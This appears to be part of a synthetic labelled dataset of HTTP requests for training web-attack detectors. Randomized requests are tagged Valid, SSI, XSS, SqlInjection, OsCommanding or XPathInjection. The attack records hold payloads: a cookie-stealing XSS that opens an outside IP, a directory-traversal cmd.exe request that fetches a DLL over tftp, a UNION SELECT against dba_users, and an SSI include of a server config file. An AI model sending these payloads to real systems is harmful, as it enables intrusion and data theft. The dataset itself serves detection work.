Warning: 544 64.237.95.167 "lcneysNrh9o" 
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 972806638968754
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47275
Start - Id: 39860
class: SSI
PUT /zFXxn377TUJ8s7OJU.V/dGY/weHureplaceP4@d/dS1OshfRDZLrldEU4Ih/eWQzKOM-dOMGDf/tpL_XhxyPTT8aKi/ysPR7W_S8OIFZKvuIUf/SdCZcLHaSL/rn/ofsie7/s_1vCjXrH0h/dp.cgi? HTTP/1.1
Content-Length: 141
Content-Language: e,otietwtk
Content-Encoding: compress
Content-Location: http://www.n7Tn5a.uk/eonst.tar.gz
Content-MD5: bXRydGM5dGx0YW44MXFzaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 05 May 06 06:24:38 UTC
Host: www.kteaer6ud.cz:76626
Connection: keep-alive
Accept: audio/*, audio/*, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: tetmnh=otatosl
Cookie: deRni=42673;rtnpe1=kFiJ<rAf1fw~tjeH replacew;ul=<!-- #include    virtual="/etc/httpd/httpd.conf" -->;ritt=s j;yntT=Htautoexecdps;oSwWUG-httplYq=62900
Date: Sat, 13 Jun 09 18:58:58 UTC
ETag: W/"O8OTMXc62HWYuirDw"
If-Unmodified-Since: Sun, 19 Oct 08 01:26:23 GMT
If-Match: "bPk97f2uXJbWZ76-etd"
Max-Forwards: 0
MIME-Version: 3.1
Referer: /Opet/dnht/wtt9/5heOo.jpeg
Trailer: Connection
User-Agent: Mozilla/8.1 (X11; U; Unix 2.2; ot-3w; rv:1.7.6) Gecko/38508409
UA-Color: color16
Via: 5.5 110.52.6.222

eemp=an|&in6ysdtc=nXCx31Nia5G&sne1amrpb2R9uoo=5cocblgerd4btY&cca=40&iseibotdahdAt=qWP_Vr8&eteY=50747&yhksp3ps=2% &ruwrt=598&ant=057573791

End - Id: 39860
Start - Id: 29147
class: Valid
GET /59a9yndUS/i.f81_EzY14ben/erE_eZd-@47-MC2/F@2ncFuFkj/lSKNPAP6vKF1DpCCr@/LEq2596emssNFcmdwindow.open/td2-4BMsp_Iiv0jwlt/ent6Ioi2tvdie/etnijnf8d2e4snCe.cfm?koh8=icc&sA7mfiaprpius=902&9cww=ytoitEsarerIo&is=mbeval&rntddRdrrH=eK8hJnjLVrUs&eot7=92636258&nt4qqecusi=gect&lsnoidc9eret=70&Llxx=ai%3BnaH&r7_kFS@accept=sa8im&Raa=rMu1Ms&lygJ=sN6%28cisock_streamuchildg HTTP/1.0
Host: 78.196.22.127
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: iprts-alist, lot-inngtem, Lpclsier-cceseqel, e1a-o;q=0.6
Cache-Control: no-transform
Client-ip: 155.217.178.62
Cookie: 4mkrweoouent=3058176;a2cayyx=5628277537;akzlOcnIme8adi=eru
Cookie2: $Version="4"
Date: Tue, 30 Aug 05 10:01:24 UTC
ETag: W/"20pELEKPTjE-Ha5et"
Expect: 100-continue
From: espn@htNyusgoaB.com
If-Modified-Since: Sun, 22 Nov 09 11:31:21 GMT
If-Unmodified-Since: Sun, 19 Oct 08 04:14:41 UTC
If-Match: *
If-None-Match: "_67DNOjbTfE2kNeSPr"
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 502
MIME-Version: 6.1
Pragma: s=ai
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: Digest username="erud"
Range: 16-2105,040491-6,551014-
Referer: http://www.ooauEdo.net/L8La/im5dewae/inltr/epynred.gif
TE: trailers
Trailer: User-Agent
User-Agent: Nemqptwt (onzJn62; hMC054p2)
UA-CPU: PowerPC
UA-Disp: 758,7778,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: FTP/5.9 240.144.208.1, HTTP/3.1 www.csmrz.shtml, 0rs/2.7 158.42.74.79
Transfer-Encoding: identity
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29147
Start - Id: 47045
class: XSS
GET /isahse9toea/mElxatWt1ieeoE/xp_fvy/orrlu2nsreaeespeu/.ETwj.js?otn=%3Cbody+onload+%3D%22+%5Bwindow.open%28%27http%3A%2F%2F230.178.48.232%2Fta.swf%27%2Bdocument.cookie%29%3B%5D%22%3E&httrajooew=8123&ttg=521120823&slacwqi=eh HTTP/1.0
Host: www.tbAdigp.ch:80
Connection: ixan
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.0, windows-1254, shift_jis
Accept-Encoding: 
Accept-Language: t9eo-htoea, lalln-b0ojrsl;q=0.3, btomsrrd-o, pGnea-eo;q=0.5
Cache-Control: no-store
Client-ip: 39.181.185.123
Cookie: 7feHhslsireW=sovrhf Tuombalrd;ioo=09044;t8f2ro5ao=azdwi
Cookie2: $Version="9"
Date: Thu, 12 Jan 06 23:22:22 CET
ETag: W/"ZuWdza31fuAokGFJWS"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Mon, 20 Dec 04 22:30:59 UTC
If-Unmodified-Since: Tue, 29 Aug 06 20:32:36 GMT
If-Match: "ihOluy_eWK7PW5T"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: http://esxd.st/i0raum/Slou/rhmoi/naelah.mpeg
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: i7INdt2tbtoqesAe
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: gzip
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47045
Start - Id: 42728
class: SqlInjection
PUT /Rel/fk8PiidrnWLB-D/ea.q0@x_cybpnCppXZW/jrtidi7eErrtozoslb/aRx5lq/pnBAf.lYXYoIMbY/e3arsq1nth/ee/rpiSO85PkNos9/hibhRhhbdpr8hnJielri/lzlqlA.css? HTTP/1.1
Content-Length: 266
Content-Language: eaj,tkh
Content-Encoding: compress
Content-MD5: YmlzbDNhaXFuc3RraXdlbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Dec 04 15:41:38 CET
Host: 82.95.120.102
Connection: n9ifn
Accept: video/mpeg, video/*;q=0.3
Accept-Charset: hz-gb-2312;q=0.3, iso-8859-8-i, iso-8859-6;q=0.7, cp-932
Accept-Encoding: 
Accept-Language: chairs'     UN/**/ION    SEL/**/ECT    lvreGur0rl FROM  dba_users   WHERE   To3Aiocr     like '%25
Cache-Control: no-store
Client-ip: 58.18.176.200
Cookie: UcinnpAwa1=tXjleheig;rnrkd9Tg=97930;h6dHeURgnns=ahttpsexece;ied-i<n2e;xe1=aatptsjhs8
Cookie2: $Version="80"
Date: Wed, 03 Sep 08 24:01:49 CET
ETag: W/"VacA3Uc-hXjcakbcpcv"
From: 6ueuo@oyblbl9dec.biz
If-Match: "18xD6p2WGyDJSCPX"
If-None-Match: "bQVUdFLZyuJ6zz1D"
Max-Forwards: 599
Authorization: Basic ZTdlaGM6ZXN1Zw==
Referer: /8tennh/iGcd9mrs.png
User-Agent: irkTfqrcOo/1.7.6
UA-Color: color16
Via: oiLzo/2.6 www.QXhDyfTs.htm

dgsmhuTbihemcao=5186677&vytqsn3iC=eers&Aeins2e= to&0haektneyttd=ijjahgosnet&nnaTie4liwlonlm=cbcbYfN5D9&60K=hi55n 95rsoshutdown&M4_@Bh5TxHOZ=2nnystylea=yp?rrnh&LS_QweToB70L=u$&eotssdssi=dkFKQWw&FWHI2E6ulra=3182349&mlNs=556&bNJ-8nn=tnldocseranaot&sy0Ngite9=32551

End - Id: 42728
Start - Id: 40870
class: SSI
GET /bs8etohdn51e/ecDNp9-T@9K5/gx6rLKa7/1etaim2Ye/ohe8earusMoxn/rxbWeeaehebnootrIAn/dnganfpuea8/ll29oC..htm?Ftnrqf=tm4-L&ttTnjo5ot=e%24&lDlee4noenFcos=us+passthru&grhvhIamiRirb=180330&potmb=qtTisqz751v&ahtnyotcea=62052&iUremnob=nLN.wCY%40l&elgy=739661941&0eevTN=s%3Ci&istxTh5akae=%3C%21--%23odbc+++++connect%3D%22dc%2Cceebb%2CNlmt%22++++++statement%3D%22select+++++*+++from+++++m%22--%3E&emlTTz=ileN%29g%26a&dl=igroup+byvaridRr%2F3bpassthrutsgsy%3B1t HTTP/1.1
Host: www.e1teenitc.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.3, ks_c_5601-1987, windows-1253, koi8-r;q=0.8, windows-874
Accept-Encoding: deflate;q=0.8
Accept-Language: er-tc082soo;q=0.5
Cache-Control: max-age=47
Client-ip: 252.64.231.123
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Fri, 01 Jan 10 15:42:06 GMT
ETag: "KbUataLGPHm7kibu58"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Mon, 12 Oct 09 07:16:34 CET
If-Unmodified-Since: Wed, 28 Nov 07 11:07:44 CET
If-Match: "fnI0Q_r-_f@9AcpP"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: Fri, 02 Jan 09 11:51:43 UTC
Max-Forwards: 94
MIME-Version: 8.5
Pragma: dDRezfn='Ogd'
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: http://sseOsi.com/eedehe.php4
TE: deflate,trailers
Trailer: Upgrade
User-Agent: 33Mh.-m3 http://www.tranu.ch
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: gzip
Upgrade: tnaaem/0.8
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40870
Start - Id: 5611
class: Valid
POST /8tetvulmgsear9mNzl/tJsaepir/heoieEdJoLOpgyunan/eo.php4? HTTP/1.1
Content-Length: 270
Content-Language: r
Content-Encoding: gzip
Content-Location: /alnieQ/kt40/r5anp.jsp
Content-MD5: ck1pcmxvT3BlZW5DYW1jeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 May 05 21:03:08 UTC
Last-Modified: Wed, 02 May 07 02:49:01 UTC
Host: www.7tPtosyl8.it
Connection: elmnews
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ea7si4-s;q=0.3, err-kcigssle;q=0.1, mole-shh;q=0.8, lae-fhe;q=0.0, enLcnrt-naa
Cache-Control: tmsmu='troY'
Client-ip: 193.158.164.119
Cookie: gmrtteetCtvagle=wEkI_S.HAGh;midzbs1cucip9=libsz;lcmnpigri1egF=3ls i?~i
Cookie2: $Version="331"
Date: Thu, 26 Apr 07 23:18:32 GMT
ETag: "FCKbUTAf5veALR26"
Expect: 100-continue
From: eStnia@as0Fhr.uk
If-Modified-Since: Mon, 02 May 05 15:42:54 CET
If-Unmodified-Since: Fri, 12 Feb 10 11:49:50 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 281
MIME-Version: 1.8
Pragma: inmJ5t=eNfoh
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Digest opaque="ali9wa"
Range: 67795-,06619-,662301-47622
Referer: http://www.iialE.net/cyterrbi/dnla/anurae5/epAon.cgi
TE: gzip
Trailer: If-Modified-Since
User-Agent: lrw0 (syYlL78QJ_)
UA-CPU: StrongARM
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: rs7i/4.6 www.jhre.png, 1.2 150.91.188.176, 0.7 245.33.38.114
Transfer-Encoding: 4d6ipy; owNuzo=ousrae
Upgrade: uv6jTt/2.4
Warning: 752 www.cBkrdl.png "UEoze97gbdRatOio" "Sat, 14 Jul 07 18:16:50 UTC"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 7014694
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

chTanoiD3hs3=hf? e&t9veEoeood=GilHesreomJ1r&1@Gx=dw]gbtka(flPgw/sand'&@.YO-8pZV=gre&ihtgunilntaeo6=oautoexecoI&eo0rtyqmattitk=I3rrhaaehscS&srzf=nwts1dPtrb&tgfh7=135&oa=iogb&sSeaENi=32421&iesnhlea=49940&O0mveDntb7=ak&4tINnuZmochasSj=@htpasses&rtan2rD=53871702

End - Id: 5611
Start - Id: 44161
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: 13.251.127.232:000
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: windows-1250;q=0.8, iso-8859-6, ks_c_5601-1987, iso-8859-5
Accept-Encoding: deflate;q=0.6
Accept-Language: EoRRast-ybsayo, aiohouca-iIHwae, 1-ayAgt;q=0.1, takG0eh-u;q=0.9, R9p-ohftiog;q=0.9
Cache-Control: no-store
Client-ip: 165.243.248.164
Cookie: rdt=6Ostdinlqpand c\tsG
Cookie2: $Version="971"
Date: Wed, 25 Nov 09 06:51:40 UTC
ETag: "fs5xbNlo-GIu_ej"
Expect: uZat4lfl=YdgRc;nrwdee
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Tue, 11 Mar 08 22:07:27 GMT
If-Match: *
If-None-Match: "aAFMp_Xb.mqXhubgY2yQ"
If-Range: "oJd_64AKOKS0H@7SE"
Max-Forwards: 61
MIME-Version: 2.1
Pragma: Rsnhet='nm4eoe'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic VXZ3OGVlc2w6Z2I4Yg==
Range: 815-,644-20793
Referer: http://frchu.uk/lodslGld/csrzaa/8shs/wcof.pl
TE: chunked
Trailer: Cache-Control
User-Agent: s0iwde0tma/4.2.2
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: FTP/8.7 107.152.169.202
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44161
Start - Id: 42908
class: OsCommanding
PUT /msanoi1u4i/t9r7wYKO2/yE6casz2BVa-K_JUy/wx61dtr/oitawraeitmteitw5/1ietnawnz/cyvOzsaca/iwymrecnld.htm? HTTP/1.1
Content-Length: 90
Content-Encoding: deflate
Content-Location: /authwin/tegei/shnk/tii4cAp.php
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Apr 06 07:52:04 UTC
Last-Modified: Thu, 28 Jun 07 03:39:41 CET
Host: www.ssteolac.de:13
Connection: lomidob
Accept: */*;q=0.7
Accept-Charset: cp-950;q=0.6
Accept-Encoding: 101.247.188.204  |  cmd.exe /s
Accept-Language: *;q=0.6
Cookie: OF-AlhYCCh0A=sC6.S;jo=ietkNfa
Date: Sun, 02 Jul 06 04:27:14 CET
MIME-Version: 5.9
Authorization: Basic M2NlMzluOnl0UWFlcVQ=
Range: -61
Referer: /hhra/0ueshito/ao5els/04tkaTq.htm
TE: trailers,trailers
User-Agent: Mozilla/4.2 (Windows; U; Win98 3.3; et-cl; rv:7.8.3) Gecko/65232833
UA-Pixels: 120x9433
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CIPuwphplkQ=8116485455&jnttewehaa=Da6f&reieciyni9e=9096&eyisnc7=085074&rtegzm=upaltrnetOin

End - Id: 42908
Start - Id: 9198
class: Valid
GET /b8lDcZ1V/s7bmzL_r/m7H1vtTFk-83D2/ano/uGQoWPbmGse7MthutEHd/tas8sydUUiQYW-ca0ht.cfm?kOnsnHtRtng=a&0yAH=xx.ZCm&qyn=m2R HTTP/1.0
Host: www.inil.be:91
Connection: close
Accept: */*;q=0.2
Accept-Charset: koi8;q=0.5, windows-1254;q=0.3
Accept-Encoding: 
Accept-Language: tiEOth8-sosAl;q=0.1, td-3Amywte4
Cache-Control: max-age=1
Client-ip: 126.184.13.215
Cookie: wctaxUsoi=90778;THjd=1whmsneneaqa;@hbgsound7E3TiN=rSkD@sB
Cookie2: $Version="6"
Date: Fri, 16 Jan 04 19:00:27 UTC
ETag: W/"lkE1DhEGRic9QJQ_c_on"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Fri, 16 Feb 07 02:47:54 UTC
If-Unmodified-Since: Sat, 02 May 09 16:24:36 UTC
If-Match: "80F5Xk@i_qWEwysAW"
If-None-Match: "73HhWXeio.c_PjI"
If-Range: Fri, 16 Apr 10 20:52:46 UTC
Max-Forwards: 59
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Digest uri=/su1oety/6WeQ8/ipsert/Qpdoi6.cfm
Range: 57164-,9027-962000
Referer: /ensren/ehSavex/udLra/1wEtaa.rar
TE: trailers
Trailer: User-Agent
User-Agent: ebripsttesa
UA-CPU: PowerPC
UA-Disp: 5248,9403,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3033x117
Via: 8.3 133.225.126.157:06384
Transfer-Encoding: gzip
Upgrade: itrdo/9.1
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 252.67.93.211
X-Serial-Number: 6194472934474
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9198
Start - Id: 26368
class: Valid
GET /3pc-Mhl85ARF5UD/sdtwLXSGln_phpw8S/uQ.tiff?stosldiecerd=ly8h2kcgew&pgityeedapsaw=265493&8ldnc6b=0965668&obE0je=b9nhometSekah&eorfa=%2BiUtt&jzedssilTt=vsRQxyCj-II&apG0nta=54&5tcrrdk29tr4S=4894826&uoOrktisb=%7Crh HTTP/1.0
Host: www.nseUs298eb.ch
Connection: rxssera
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.8, gzip;q=0.5, identity, compress;q=0.5
Accept-Language: *;q=0.1
Cache-Control: min-fresh=64
Client-ip: 239.154.38.15
Cookie: etrfesu=oi;erkr=lI5W5qJ@;Xpeus=Nopenecat]s(@|r~ea;-CRb=uhud\ha9dphtpasss;eae=henull;nihNente8ae=/anu3oa]iriiframen
Cookie2: $Version="52"
Date: Wed, 27 Apr 05 19:53:07 UTC
ETag: W/"UkaxUoqYwNVMNpuyUIr7"
Expect: muahett
From: aohsta@Drsany8eS8.com
If-Modified-Since: Sat, 27 Jan 07 16:16:50 UTC
If-Unmodified-Since: Sun, 27 Apr 08 21:56:54 UTC
If-Match: *
If-None-Match: "toj5x5.jI-FtFuRORux1"
If-Range: Fri, 22 Jun 07 20:46:59 GMT
Max-Forwards: 792
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dt5a"
Authorization: neortn aacfT=ndszi5
Range: 7-,8-
Referer: http://www.Hotn6tdo.st/renosnst.gz
TE: gzip;q=0.7,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.8 (X11; U; Open BSD i586 7.6; ao-ao; rv:4.4.8) Gecko/52304617
UA-CPU: 68000
UA-Disp: 4074,748,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 778x382
Via: 0.3 65.76.244.0:36832, HTTP/5.2 188.31.241.103
Transfer-Encoding: identity
Upgrade: f3i/7.2, 4xgd/4.9, 4m3er7/4.0, uiai/5.6
Warning: 900 33.197.164.138 "2Ht9Fspan" "Tue, 08 Feb 05 10:29:57 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 683890347
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26368
Start - Id: 23639
class: Valid
GET /Kt6tthG/ef67g5oowul6bs/silundHainen4emeboo/YkGMMlogtservices%uSV/dsw2Nc63Pohom/cf.pAyaX-16W/TNIqbhee1idf.jsp?hlDn=amlalh6oonsj8n&ro=uia%7E&wjasbtnoijdesf=99&34sieE=8dieg&zDSIdgI7gK=Ttatne&cinvC1wselecteXJ.w=762256&g3i=a4oipte&K5.inc4ornP0dO=-h+&qdpflgttkle=836087&Nnaua1c=edaei+sor&byyailm=5974 HTTP/1.1
Host: 251.129.225.182
Connection: wyanFgl
Accept: audio/*;q=0.0, text/plain;q=0.5, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rvs-8E9lidc;q=0.4, dks-9iEfxh9f;q=0.5
Cache-Control: max-stale
Client-ip: 73.200.143.180
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="553"
Date: Mon, 08 Oct 07 18:43:40 UTC
ETag: "XIQI_03OH24JNGEZ"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Fri, 10 Dec 04 11:39:37 CET
If-Unmodified-Since: Sun, 23 Mar 08 15:47:10 UTC
If-Match: *
If-None-Match: "bYF-enzgvp098hka"
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 62
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: Basic bzFlaTp1Z2xGOXN0bw==
Range: 13344-7165,79151-
Referer: http://www.roeo.org/ceine/tzydsHia/h4fti3.msf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: iecp0moiessyana
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 361x375
Via: FTP/1.7 254.133.196.253, 5.2 www.rira.jpeg
Transfer-Encoding: identity
Upgrade: nessN/8.6
Warning: 121 www.uloio.gif "dae4cslezep1pcddhxee" "Fri, 17 Dec 04 20:23:59 GMT"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23639
Start - Id: 1601
class: Valid
GET /ymesto/oUJN8L1Gp.UVZ/hifsWNVDC6/6sojp8a.sh?btCizhsDb=54802166&r6mt_ce=03&b72eotre6l=ndrr&aNzorRn=o%2Betelnet&c2frRtlVa2i=s9hainss6mot&uIosnkoqdydlu=s4tmh1een&0e0aeswhg=o7tEd&de=twjvCwQ.AaB_&tqr_accept=oYDXe_Urrq&yCfV8A8=078 HTTP/1.0
Host: www.slzwiyttrn.be:80
Connection: keep-alive
Accept: image/png
Cache-Control: no-cache
Date: Sat, 05 May 07 18:57:57 CET
ETag: W/"SDp89FXIDh9KS9uH4B"
If-Modified-Since: Mon, 29 Sep 08 16:28:35 GMT
Referer: /aeSkteee/ieqbtTht/eerrcbl.nsf
User-Agent: i9ro (tT.gX4pgS; orqfzP; qN64B2i; dfdEW2Vu)
Via: 2.2 79.157.200.240:601

null

End - Id: 1601
Start - Id: 307
class: Valid
GET /dc8mqr_7LTzX/sSq5.Q38/a26Zbl3A2-yLkG/UaehormvneNyaai/HSZP.cV_m1@/0htesh/btROWX.pl?qsoifuddaaao=ttOJ2zAINJu&areih6fsd=tsMi1kZ-zI6.&wjrfod=Eoeuxmlnetcat%3BWinsertrainsertuesock_streamoCi&ore2a9jtso=imwdzb5Rl2zX&rtnhiemcphwtu=1el1Ut&ned=Idmd&etfldoSt=E&l3tU_=ds&RffPAvEp1V3u=t6 HTTP/1.0
Host: 68.178.123.245
Connection: atoa
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 157.214.192.75
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Sat, 17 Jan 04 20:24:35 GMT
ETag: W/"5I-t-ACF@We_@x@jrE"
Expect: 100-continue
From: atOG@okZhh.fr
If-Modified-Since: Thu, 10 Jul 08 16:31:48 UTC
If-Unmodified-Since: Sun, 22 Jun 08 02:37:05 CET
If-Match: *
If-None-Match: "ZW6UttP0XGcnen_t"
If-Range: *
Max-Forwards: 422
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic b2xhczpzbmlvb2lzbw==
Range: 018198-760671,-91
Referer: http://Stamv.it/oaxut/n7onlw/r5tsouL.sh
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/8.9 (compatible; 7Nsrtb; Linux i386; rtaoe7irN; hiftn)
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4622x2387
Via: 8.9 188.139.96.159:09
Transfer-Encoding: hl9me; naeRip=ltNrwe
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 307
Start - Id: 48723
class: XPathInjection
GET /2aetzyi/aMecahimcneoroi8t/23_an0Ld8DmYzVnDo/esidnenbcn2lpaice/tTrg5rEf/t.gd8T/E.t4eBwaU/tfb4U7/zmeFfs.js?aermbsha=hrs2tule%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++%27oc%27+%3D+%27&.5gm=%3Eiibs&jsmmp4ssato=3007&nwReeenoblc1Im2=t&z4.M253Wzv=eSemn&tntcecioe=rjHE&KR1tmpA7Nr=eDiei%26ynerene&TiVaz.a=iesc9urt&54iETktor9sen=1148&iseiets9sa38ri=no%3DS%2F&psg9gtrusSC=htl&Uyt=taas&rtceemiItlb=0JternqgnrIrnf&e2oUrwmlf=gmoodR&6mA1nefodt=catH HTTP/1.1
Host: www.a2arusteil.st
Connection: keep-alive
Accept: image/gif, application/*;q=0.5
Accept-Charset: cp-936;q=0.7
Accept-Encoding: *
Accept-Language: ehgn-k4c;q=0.5, etil-atSoet, r-Doabeo8e, v-Eweoe;q=0.2
Cache-Control: no-store
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="515"
Date: Sun, 12 Sep 04 16:46:49 UTC
ETag: W/"yhMn62dM5xWKyaoz2U"
Expect: sdse=cnCt
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Mon, 12 May 08 07:23:52 GMT
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "3VPG4W1@UZ_oAAAC"
If-None-Match: *
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 5095
Pragma: no-cache
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Basic dGVFZTppa3U5aA==
Range: 7-577073
Referer: http://www.sedsm.it/re3orS/dirW/eimbet/vsnibwhl.swf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.6 (X11; U; SunOS sun4u 3.9; os-bx; rv:6.3.2) Gecko/24128107
UA-CPU: MIPS
UA-Pixels: 0339x4942
Via: lrci/5.7 224.152.2.79, FTP/9.5 www.tsynDl.jpg:324
Transfer-Encoding: hr5re
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48723
Start - Id: 2223
class: Valid
GET /iB/al1teinidaiuounaoIt/SJXlocation/toR-E/rwnozs1erete/or/kf/e0A/-H@qBk0M/HeynerjeNd/quo3eeeltuttt9a.js? HTTP/1.1
Host: 207.80.2.108
Connection: na4ecef
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, windows-1258;q=0.0
Accept-Encoding: 
